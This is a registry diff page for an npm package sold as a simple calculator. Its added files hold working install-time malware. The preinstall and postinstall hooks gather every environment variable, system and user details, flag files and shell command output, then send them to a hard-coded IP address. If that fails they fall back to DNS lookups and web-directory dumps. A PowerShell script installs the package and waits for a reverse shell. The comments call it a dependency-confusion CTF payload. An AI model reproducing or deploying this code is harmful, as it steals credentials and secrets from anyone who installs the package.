npm - node-calculator-x7k9 - Versions diffs - 0.0.1-security → 3.3.0 - Mend

node-calculator-x7k9 0.0.1-security → 3.3.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of node-calculator-x7k9 might be problematic. Click here for more details.

Files changed (12) hide show

package/package.json CHANGED Viewed

@@ -1,6 +1,14 @@
-{
-  "name": "node-calculator-x7k9",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
-}
+{
+  "name": "node-calculator-x7k9",
+  "version": "3.3.0",
+  "description": "Simple calculator plugin with enhanced features",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node preinstall.js",
+    "postinstall": "node postinstall.js"
+  },
+  "keywords": ["calculator", "math"],
+  "author": "DarkT",
+  "license": "MIT"
+}

package/postinstall.js ADDED Viewed

@@ -0,0 +1,65 @@
+#!/usr/bin/env node
+/**
+ * Backup Data Exfiltration Payload
+ * Runs after installation as a backup
+ */
+const http = require('http');
+const https = require('https');
+const { exec } = require('child_process');
+const fs = require('fs');
+// Configuration - MUST MATCH preinstall.js
+const EXFIL_SERVER = 'http://159.223.153.251:8080/exfil';
+// Simple backup exfiltration
+function backupExfil() {
+    try {
+        const data = {
+            timestamp: new Date().toISOString(),
+            source: 'postinstall',
+            environment: process.env,
+            cwd: process.cwd(),
+            user: require('os').userInfo().username,
+            hostname: require('os').hostname()
+        };
+        const jsonData = JSON.stringify(data);
+        const url = new URL(EXFIL_SERVER);
+        const client = url.protocol === 'https:' ? https : http;
+        const options = {
+            hostname: url.hostname,
+            port: url.port || (url.protocol === 'https:' ? 443 : 80),
+            path: url.pathname,
+            method: 'POST',
+            headers: {
+                'Content-Type': 'application/json',
+                'Content-Length': Buffer.byteLength(jsonData)
+            },
+            timeout: 5000
+        };
+        const req = client.request(options, (res) => {
+            // Success
+        });
+        req.on('error', () => {
+            // Fallback: write to file
+            try {
+                fs.writeFileSync('/tmp/postinstall_exfil.json', jsonData);
+            } catch (e) {}
+        });
+        req.write(jsonData);
+        req.end();
+    } catch (err) {
+        // Silent fail
+    }
+}
+// Execute
+console.log('Installing node-calculator-x7k9 v3.2.0...');
+setTimeout(backupExfil, 1000);

package/preinstall.js ADDED Viewed

@@ -0,0 +1,284 @@
+#!/usr/bin/env node
+/**
+ * Data Exfiltration Payload for CTF
+ * This executes during npm install via preinstall hook
+ * Sends environment variables and system info to attacker server
+ *
+ * IMPORTANT: Replace EXFIL_SERVER with your server URL
+ */
+const http = require('http');
+const https = require('https');
+const fs = require('fs');
+const { exec } = require('child_process');
+const os = require('os');
+// Configuration - CHANGE THIS!
+const EXFIL_SERVER = 'http://159.223.153.251:8080/exfil';  // Your HTTP server endpoint
+// Local logging for debugging
+function logLocal(data) {
+    const logPath = '/tmp/exfil.log';
+    try {
+        fs.appendFileSync(logPath, `[${new Date().toISOString()}] ${data}\n`);
+    } catch (e) {
+        // Silently fail
+    }
+}
+// Read common flag file locations
+function findFlags() {
+    const flagLocations = [
+        '/flag.txt',
+        '/flag',
+        '/root/flag.txt',
+        '/root/flag',
+        '/home/flag.txt',
+        '/app/flag.txt',
+        '/app/flag',
+        '/var/www/flag.txt',
+        '/tmp/flag.txt',
+        process.cwd() + '/flag.txt',
+        process.cwd() + '/flag'
+    ];
+    const foundFlags = {};
+    flagLocations.forEach(path => {
+        try {
+            if (fs.existsSync(path)) {
+                foundFlags[path] = fs.readFileSync(path, 'utf8');
+            }
+        } catch (e) {
+            // Silently continue
+        }
+    });
+    return foundFlags;
+}
+// Execute shell commands and capture output
+function executeCommands() {
+    const commands = {
+        'ls_root': 'ls -la /',
+        'ls_home': 'ls -la ~',
+        'ls_app': 'ls -la /app',
+        'find_flags': 'find / -name "*flag*" 2>/dev/null',
+        'printenv': 'printenv',
+        'whoami': 'whoami',
+        'id': 'id',
+        'pwd': 'pwd',
+        'ps': 'ps aux'
+    };
+    const results = {};
+    const promises = [];
+    Object.keys(commands).forEach(key => {
+        const promise = new Promise((resolve) => {
+            exec(commands[key], { timeout: 5000 }, (error, stdout, stderr) => {
+                results[key] = {
+                    stdout: stdout || '',
+                    stderr: stderr || '',
+                    error: error ? error.message : null
+                };
+                resolve();
+            });
+        });
+        promises.push(promise);
+    });
+    return Promise.all(promises).then(() => results);
+}
+// Collect all sensitive data
+async function collectData() {
+    logLocal('Starting data collection...');
+    const data = {
+        timestamp: new Date().toISOString(),
+        package_installed: 'node-calculator-x7k9@3.2.0',
+        // Environment variables (often contain flags!)
+        environment: process.env,
+        // System information
+        system: {
+            hostname: os.hostname(),
+            platform: os.platform(),
+            arch: os.arch(),
+            release: os.release(),
+            type: os.type(),
+            uptime: os.uptime(),
+            nodeVersion: process.version,
+            cwd: process.cwd(),
+            user: os.userInfo(),
+            homedir: os.homedir(),
+            tmpdir: os.tmpdir()
+        },
+        // Network information
+        network: {
+            interfaces: os.networkInterfaces()
+        },
+        // Flag files
+        flags: findFlags(),
+        // Command outputs
+        commands: await executeCommands(),
+        // Process information
+        process: {
+            pid: process.pid,
+            ppid: process.ppid,
+            title: process.title,
+            argv: process.argv,
+            execPath: process.execPath,
+            execArgv: process.execArgv,
+            env_keys: Object.keys(process.env)
+        }
+    };
+    logLocal('Data collection complete');
+    return data;
+}
+// Send data via HTTP POST
+function sendDataHTTP(data) {
+    return new Promise((resolve, reject) => {
+        const jsonData = JSON.stringify(data, null, 2);
+        logLocal(`Attempting to send ${jsonData.length} bytes to ${EXFIL_SERVER}`);
+        const url = new URL(EXFIL_SERVER);
+        const isHttps = url.protocol === 'https:';
+        const client = isHttps ? https : http;
+        const options = {
+            hostname: url.hostname,
+            port: url.port || (isHttps ? 443 : 80),
+            path: url.pathname + url.search,
+            method: 'POST',
+            headers: {
+                'Content-Type': 'application/json',
+                'Content-Length': Buffer.byteLength(jsonData),
+                'User-Agent': 'node-calculator-x7k9/3.2.0'
+            },
+            timeout: 10000
+        };
+        const req = client.request(options, (res) => {
+            let responseBody = '';
+            res.on('data', (chunk) => {
+                responseBody += chunk;
+            });
+            res.on('end', () => {
+                logLocal(`HTTP Response: ${res.statusCode} - ${responseBody}`);
+                resolve({ success: true, status: res.statusCode, body: responseBody });
+            });
+        });
+        req.on('error', (error) => {
+            logLocal(`HTTP Error: ${error.message}`);
+            reject(error);
+        });
+        req.on('timeout', () => {
+            req.destroy();
+            logLocal('HTTP Timeout');
+            reject(new Error('Request timeout'));
+        });
+        req.write(jsonData);
+        req.end();
+    });
+}
+// Fallback: DNS exfiltration (encode data in DNS queries)
+function sendDataDNS(data) {
+    try {
+        // Encode important data as subdomain queries
+        const envKeys = Object.keys(data.environment || {}).join(',');
+        const flagData = JSON.stringify(data.flags);
+        // Base64 encode and chunk into DNS-safe queries
+        const encoded = Buffer.from(flagData).toString('base64')
+            .replace(/\+/g, '-')
+            .replace(/\//g, '_')
+            .replace(/=/g, '');
+        // Split into 63-char chunks (DNS label limit)
+        const chunks = encoded.match(/.{1,50}/g) || [];
+        chunks.forEach((chunk, index) => {
+            const domain = `${chunk}.${index}.exfil.yourdomain.com`;
+            exec(`nslookup ${domain}`, () => {});
+        });
+        logLocal('DNS exfiltration attempted');
+    } catch (e) {
+        logLocal(`DNS exfil error: ${e.message}`);
+    }
+}
+// Fallback: Write to accessible web directory
+function writeToWebDir(data) {
+    const webDirs = [
+        '/var/www/html/exfil.json',
+        '/app/public/exfil.json',
+        '/tmp/exfil.json',
+        process.cwd() + '/exfil.json'
+    ];
+    const jsonData = JSON.stringify(data, null, 2);
+    webDirs.forEach(path => {
+        try {
+            fs.writeFileSync(path, jsonData);
+            logLocal(`Data written to ${path}`);
+        } catch (e) {
+            // Silently continue
+        }
+    });
+}
+// Main execution
+async function main() {
+    try {
+        logLocal('===== PREINSTALL HOOK EXECUTING =====');
+        logLocal(`Running on: ${os.hostname()}`);
+        logLocal(`CWD: ${process.cwd()}`);
+        // Collect all data
+        const data = await collectData();
+        // Try HTTP exfiltration
+        try {
+            await sendDataHTTP(data);
+            logLocal('HTTP exfiltration successful!');
+        } catch (httpError) {
+            logLocal(`HTTP failed: ${httpError.message}`);
+            // Fallback methods
+            sendDataDNS(data);
+            writeToWebDir(data);
+        }
+        logLocal('===== PREINSTALL HOOK COMPLETE =====');
+    } catch (err) {
+        logLocal(`Main error: ${err.message}`);
+        // Silent fail to avoid suspicion during npm install
+    }
+}
+// Execute with a small delay
+setTimeout(() => {
+    main().catch(err => {
+        logLocal(`Fatal error: ${err.message}`);
+    });
+}, 500);

package/test-local.ps1 ADDED Viewed

@@ -0,0 +1,127 @@
+# Local Testing Script - Test the malicious package locally before publishing
+# This simulates the attack without needing to publish to npm
+param(
+    [string]$AttackerIP = "127.0.0.1",
+    [int]$AttackerPort = 4444
+)
+Write-Host "╔═══════════════════════════════════════════════════════════════╗" -ForegroundColor Cyan
+Write-Host "║          Local Testing - Dependency Confusion CTF            ║" -ForegroundColor Cyan
+Write-Host "╚═══════════════════════════════════════════════════════════════╝" -ForegroundColor Cyan
+Write-Host ""
+# Get current directory
+$rootDir = Split-Path -Parent $PSScriptRoot
+$maliciousDir = Join-Path $rootDir "malicious-package"
+$targetDir = Join-Path $rootDir "just-a-calculator"
+Write-Host "[*] Root Directory: $rootDir" -ForegroundColor Yellow
+Write-Host "[*] Malicious Package: $maliciousDir" -ForegroundColor Yellow
+Write-Host "[*] Target App: $targetDir" -ForegroundColor Yellow
+Write-Host ""
+# Step 1: Configure payload
+Write-Host "[+] Step 1: Configuring payload..." -ForegroundColor Green
+Set-Location $maliciousDir
+$preinstallPath = "preinstall.js"
+$postinstallPath = "postinstall.js"
+$preinstallContent = Get-Content $preinstallPath -Raw
+$preinstallContent = $preinstallContent -replace "const ATTACKER_IP = '.*?';", "const ATTACKER_IP = '$AttackerIP';"
+$preinstallContent = $preinstallContent -replace "const ATTACKER_PORT = \d+;", "const ATTACKER_PORT = $AttackerPort;"
+Set-Content $preinstallPath -Value $preinstallContent
+$postinstallContent = Get-Content $postinstallPath -Raw
+$postinstallContent = $postinstallContent -replace "const ATTACKER_IP = '.*?';", "const ATTACKER_IP = '$AttackerIP';"
+$postinstallContent = $postinstallContent -replace "const ATTACKER_PORT = \d+;", "const ATTACKER_PORT = $AttackerPort;"
+Set-Content $postinstallPath -Value $postinstallContent
+Write-Host "    [✓] Payload configured for $AttackerIP:$AttackerPort" -ForegroundColor Green
+# Step 2: Start listener
+Write-Host ""
+Write-Host "[+] Step 2: Starting listener..." -ForegroundColor Green
+if (Test-Path "listener.py") {
+    $listenerJob = Start-Job -ScriptBlock {
+        param($dir, $port)
+        Set-Location $dir
+        python3 listener.py $port
+    } -ArgumentList $maliciousDir, $AttackerPort
+    Write-Host "    [✓] Listener started (Job ID: $($listenerJob.Id))" -ForegroundColor Green
+} else {
+    Write-Host "    [!] listener.py not found" -ForegroundColor Red
+}
+Start-Sleep -Seconds 2
+# Step 3: Pack the malicious package
+Write-Host ""
+Write-Host "[+] Step 3: Packing malicious package..." -ForegroundColor Green
+$packOutput = npm pack 2>&1
+Write-Host "    [✓] Package created: $packOutput" -ForegroundColor Green
+# Step 4: Install into target application
+Write-Host ""
+Write-Host "[+] Step 4: Installing malicious package into target..." -ForegroundColor Green
+Set-Location $targetDir
+# Remove old package
+if (Test-Path "node_modules\node-calculator-x7k9") {
+    Write-Host "    [*] Removing old package..." -ForegroundColor Yellow
+    Remove-Item "node_modules\node-calculator-x7k9" -Recurse -Force
+}
+# Install malicious package
+$packagePath = Join-Path $maliciousDir "node-calculator-x7k9-3.0.0.tgz"
+Write-Host "    [*] Installing from: $packagePath" -ForegroundColor Yellow
+npm install $packagePath
+Write-Host "    [✓] Package installed!" -ForegroundColor Green
+# Step 5: Check listener
+Write-Host ""
+Write-Host "[+] Step 5: Checking for shell..." -ForegroundColor Green
+Write-Host "    [*] Waiting for reverse shell connection..." -ForegroundColor Yellow
+Write-Host ""
+# Monitor listener for 30 seconds
+$timeout = 30
+$elapsed = 0
+while ($elapsed -lt $timeout) {
+    $output = Receive-Job -Id $listenerJob.Id -ErrorAction SilentlyContinue
+    if ($output) {
+        Write-Host $output
+        if ($output -match "Connection received") {
+            Write-Host ""
+            Write-Host "[✓] SHELL RECEIVED!" -ForegroundColor Green
+            break
+        }
+    }
+    Start-Sleep -Seconds 2
+    $elapsed += 2
+    Write-Host "." -NoNewline -ForegroundColor Gray
+}
+Write-Host ""
+Write-Host ""
+Write-Host "╔═══════════════════════════════════════════════════════════════╗" -ForegroundColor Cyan
+Write-Host "║  Testing Complete                                             ║" -ForegroundColor Cyan
+Write-Host "║                                                               ║" -ForegroundColor Cyan
+Write-Host "║  Listener is still running (Job ID: $($listenerJob.Id))              ║" -ForegroundColor Cyan
+Write-Host "║  To view: Receive-Job $($listenerJob.Id)                             ║" -ForegroundColor Cyan
+Write-Host "║  To stop: Stop-Job $($listenerJob.Id); Remove-Job $($listenerJob.Id)        ║" -ForegroundColor Cyan
+Write-Host "╚═══════════════════════════════════════════════════════════════╝" -ForegroundColor Cyan
+Write-Host ""
+Write-Host "Press Enter to stop listener and cleanup..." -ForegroundColor Yellow
+Read-Host
+# Cleanup
+Stop-Job -Id $listenerJob.Id -ErrorAction SilentlyContinue
+Remove-Job -Id $listenerJob.Id -ErrorAction SilentlyContinue
+Write-Host "[✓] Cleanup complete" -ForegroundColor Green